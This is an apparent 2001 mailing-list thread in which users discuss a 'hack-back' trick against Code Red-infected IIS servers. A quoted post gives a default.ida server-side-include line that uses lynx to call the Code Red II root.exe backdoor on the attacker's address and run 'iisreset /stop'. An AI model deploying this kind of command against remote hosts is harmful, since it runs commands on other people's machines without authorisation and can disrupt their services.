The lynx-source part is just a command being issued to the IIS server though the backdoor installed by CR2. The .ida file you're creating is just a server side include telling the server to run that lynx-souce command. On Wednesday 29 August 2001 06:10, you wrote: > Nice. If only I could get it onto my cisco 675 and make IT us it... > In any case, I do not run a webserver (the cisco can - though it is shut > off as a result of the CodeRed traffic). I am totally unfamiliar with > webserver stuff. What language is this? Ruby? Perl? PHP? Something else? > > On Tuesday 28 August 2001 08:00 pm, Expert wrote: > > What does happen? > > > > On Thursday 16 August 2001 03:54 am, so spoke Gabriel Fortuna: > > > Yeah, I suppose it's quite cool to brag about the number of CodeRed > > > hits we get, what about doing something (de)constructive about this > > > menace... > > > > > > I found this gem on Linuxbrit.co.uk... I think. > > > > > > 1) Create a file called default.ida, in there add this: > > > > > > <!--#exec cmd="lynx -source > > > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"--> > > [...]
Want to buy your Pack or Services from MandrakeSoft? Go to http://wwww.mandrakestore.com